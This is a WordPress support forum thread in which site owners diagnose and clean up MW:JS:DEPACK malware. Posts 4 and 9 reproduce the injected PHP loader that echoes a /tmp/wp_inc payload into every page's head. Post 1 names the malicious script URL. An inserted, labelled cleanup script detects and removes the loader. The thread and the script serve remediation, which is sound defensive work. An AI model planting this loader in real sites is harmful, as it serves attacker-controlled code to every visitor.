Virus on my site?? Please help! (12 posts)

  1. daniel7rusu
    Member
    Posted 2 years ago #

    Avast shows a virus on our site: kayzoe.com.

    I ran 2 scans:

    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/security-report/?page=www.kayzoe.com

    They both show problems. Sucuri shows this malware: http://sucuri.net/malware/entry/MW:JS:DEPACK, Unmask shows: http://dtym7iokkjlif.cloudfront.net/dough/1.0/recipe.js

    Please help, what do I need to do?

  2. Samuel B
    moderator
    Posted 2 years ago #

  3. JonBon3386
    Member
    Posted 2 years ago #

    I'm having the same kind of problems on all of my sites today. They were all fine the last time I checked them a few days ago... Any others having this issue?

  4. kastnercreative
    Member
    Posted 2 years ago #

    Yeah, same thing has happened to me... can't really find where the malicious code is coming from - pulling my hair out right now.

    The only file that has changed on the entire site in the last 24 hours is wp-settings.php and I can't see anything unusual in there...

    Update: Ok, well I replaced my wp-settings.php with an older version I had from about a month ago and it seems to have removed the malicious script tag that was being appended to the page headers....

    These seem to be the only lines of code that were different...?? Anyone able to decipher what this function is doing?

    function check_wordpress(){
        // Injected loader: sys_get_temp_dir() is normally /tmp, so this reads
        // /tmp/wp_inc (the dropped payload) and echoes its contents straight
        // into the page output.
        $t_d = sys_get_temp_dir();
        if(file_exists($t_d . '/wp_inc')){
            readfile($t_d . '/wp_inc');
        }
    }
    // Runs the loader on the wp_head hook, i.e. inside <head> on every
    // page view, which is why the script tag shows up in the page headers.
    add_action('wp_head', 'check_wordpress');

    // This line is WordPress's own; the block above was inserted before it.
    do_action( 'init' );

  5. victorciobanu
    Member
    Posted 2 years ago #

    Happened to me too, server-wide (about 30 WordPress installs were affected).
    Managed to fix everything in about 10 minutes and wrote an article about how to fix the issue on my blog: How to Remove MW:JS:DEPACK

    To answer kastnercreative's question: your server is infected, mate (the wp_inc file can be found in the /tmp folder). Either remove the lines in wp-settings.php or the code in the wp_inc file.

  6. JeanetteM
    Member
    Posted 2 years ago #

    @victorciobanu Thanks for that tutorial. I did the first part and it seems to have cleared the problem of malware showing up on the scans.

    However, the second part (step 9), I am unclear how to do. I'm not a programmer nor knowledgeable with code.

    How do you remove the code and the file from the server? Well, SSH into your machine using Putty or whatever you like best, login as root (su) and run MC (Midnight Commander) (if you don't have it on your linux server, install it using "wget mc" or whatever the command is on your linux (I use a mandriva distro)).
    After you are in MC, go to the top level and go to Command => Find file => Filename: wp_inc. Let MC look for it and when it finds it (in your /tmp folder), edit the file (F4) and delete the malware from it. And you are done! Pat yourself on your shoulder for being a super admin.

    I can't quite pat myself on the back yet. lol! Do you mean to log into our host provider's server? I have never used SSH or Putty before. I do most everything from the control panel of my host, and I try to do very minor stuff as in the first part of your tutorial.

  7. victorciobanu
    Member
    Posted 2 years ago #

    @JeanetteM sorry for being unclear

    I run my own server, so I have full rights on it and can access it as root, and in my case the /tmp folder of the machine (Linux server) was infected!

    - this is not the case when you use shared hosting provided to you by a 3rd party.

    When you use a host's server, a /tmp folder is created just for you, and in theory (only) in that /tmp folder (look for it in your root, not in /www/...) you should find a wp_inc file. Replace that wp_inc file with a blank one and set it to read-only (chmod 444) so this does not happen again.

    This, however, only fixes this particular issue. You probably still can have other files infected, so my best bet would be to also chmod 444 (read-only) the wp-settings.php file in your WordPress install, to prevent it from being infected again. But REMEMBER you did this, since when you upgrade your WordPress this file will not get overwritten (updated) and all hell can break loose.

  8. JeanetteM
    Member
    Posted 2 years ago #

    @victorciobanu thanks for the prompt reply. I will try to look for the /tmp folder or talk to my host provider. I think I need to talk to them anyway as I also have been getting a lot more 500 server errors than usual.

    btw, if we make the wp-settings.php file read-only, would we have to remember to manually update this file every time we update WordPress then?

  9. victorciobanu
    Member
    Posted 2 years ago #

    @JeanetteM
    Either manually update it or just remember to switch it back to 644 (owner has permission to write) before updating the WordPress install.

    About the 500 server error, I would recommend backing up your site (SQL database and files) immediately, since the issues might be related.

    I have a horror story for you: a while back (3 weeks) a similar malware code affected one of my WordPress sites created for a client and hosted on justhost, and when this issue arose, justhost deleted the SQL database. No warnings, no nothing... and yes, I did not have a backup :(

    I'm not saying that this is the case with your site, but better safe than sorry.

    ALSO, to whom it may concern: the error

    Parse error: syntax error, unexpected '<' in /path/www/genericsite.tld/wp-settings.php on line 131

    is also caused by this malware; it affects old WordPress installs where the insertion of

    function check_wordpress(){
        $t_d = sys_get_temp_dir();
        if(file_exists($t_d . '/wp_inc')){
            readfile($t_d . '/wp_inc');
        }
    }
    add_action('wp_head', 'check_wordpress');
    do_action( 'init' );

    broke the file.
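
As an added example (not code from this thread, from victorciobanu's article, or from WordPress itself), here is a shell script that automates the cleanup described in posts 4, 5, 7 and 9: it finds every wp-settings.php under a web root that still carries the loader, strips the injected block while leaving WordPress's own do_action( 'init' ) line in place, blanks and read-only-protects any wp_inc in the temp directory, and, when the php binary is available, lints the edited file so the parse error mentioned above is caught before a visitor sees it. It assumes a Linux host with find, grep, sed and cp; the web root you pass in and TMPDIR are the caller's, and the /var/www path in the usage comment is only illustrative.

```sh
#!/bin/sh
# Added example, not code from this thread or from WordPress: locate and
# neutralise the wp_inc loader the posts above describe.  Assumes a Linux
# host with find, grep, sed and cp.  The web root passed in and TMPDIR are
# the caller's; nothing here is specific to one hosting provider.
set -eu

# PHP's sys_get_temp_dir() honours TMPDIR and falls back to /tmp, which is
# where the injected readfile() looks.  Ask PHP itself too when it is
# installed, but remember the web server's PHP may inherit a different
# environment than your login shell (one reason posts 10 and 12 found no
# wp_inc under /tmp).
wp_inc_candidates() {
    {
        printf '%s\n' "${TMPDIR:-/tmp}/wp_inc" /tmp/wp_inc
        if command -v php >/dev/null 2>&1; then
            printf '%s/wp_inc\n' "$(php -r 'echo sys_get_temp_dir();')"
        fi
    } | sort -u
}

# Print every wp-settings.php under $1 that still carries the loader.
# Matching on the readfile() of wp_inc rather than on check_wordpress()
# also catches a copy where only the function name was changed.
find_injected_settings() {
    find "$1" -type f -name wp-settings.php \
        -exec grep -lE "readfile\(.*/wp_inc['\"]" {} + 2>/dev/null || true
}

# Delete the injected block from one wp-settings.php, keeping a backup.
# The range runs from the function definition to the add_action() that
# hooks it into wp_head; the do_action( 'init' ) line after it is genuine
# WordPress code and must stay, or you get post 9's parse error.
clean_settings_file() {
    f="$1"
    cp -p "$f" "$f.infected.bak"
    chmod u+w "$f"      # undo a chmod 444 applied earlier (post 7); re-apply it afterwards if you want it
    sed '/^[[:space:]]*function check_wordpress()/,/^[[:space:]]*add_action(.wp_head., *.check_wordpress.)/d' \
        "$f" > "$f.clean"
    cat "$f.clean" > "$f"   # cat, not mv, keeps the file's owner and mode
    rm -f "$f.clean"
    if command -v php >/dev/null 2>&1; then
        php -l "$f" >/dev/null   # fails the script if the edit broke the file
    fi
}

# Replace each wp_inc payload with an empty read-only file, post 7's step.
# An empty file keeps any surviving copy of the loader harmless, and the
# backup keeps the payload for whoever investigates how it got there.
neutralise_wp_inc() {
    for p in $(wp_inc_candidates); do
        if [ -e "$p" ]; then
            cp -p "$p" "$p.infected.bak"
            chmod u+w "$p"
            : > "$p"
            chmod 444 "$p"
            echo "neutralised $p"
        fi
    done
}

# PHP files changed within the last day: post 4 found the infection by
# noticing that wp-settings.php was the only file that had changed.
recently_modified() {
    find "$1" -type f -name '*.php' -mtime -1 | sort
}

# Usage: scan_and_clean /var/www   (path is illustrative; use your web root)
scan_and_clean() {
    for f in $(find_injected_settings "$1"); do
        echo "cleaning $f"
        clean_settings_file "$f"
    done
    neutralise_wp_inc
}
```

Run it as the user that owns the WordPress files (or as root on your own box), and check recently_modified afterwards as well: the loader only reads wp_inc, so cleaning it says nothing about how the attacker wrote to wp-settings.php in the first place. Paths containing spaces are not handled by the for loops.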

  10. kastnercreative
    Member
    Posted 2 years ago #

    Weird, I cleaned the code out of my wp-settings.php yesterday and that fixed it.

    However, I can't find the wp_inc file or folder in the tmp folder on the server... weird, I wonder maybe if it's been cleaned up by my hosting provider's virus scanning... odd.

  11. JeanetteM
    Member
    Posted 2 years ago #

    @victorciobanu thanks for the warning! I will be more diligent with backups, especially after this bout with malware.

    Last night, my host shut down all my sites (after Google had removed the ban) because of the malware issues. Luckily, they did not just delete the databases. They were nice enough to scan it for me and gave me a list of infected files to clean up. I did that and have my sites back up this morning.

  12. 82concepts
    Member
    Posted 2 years ago #

    Here is another link that goes into detail about the situation. The comments are similar to here but both may progress with new advice.

    Also, I could not find the wp_inc file at all, I am going to send a notice to my host to make sure it did not go to their root folders. I'm praying that the malicious code was only in the settings file. Changing the permissions to chmod 444 on the settings may help a little, as well.

    http://www.victorciobanu.com/how-to-remove-mwjsdepack/

Topic Closed

This topic has been closed to new replies.
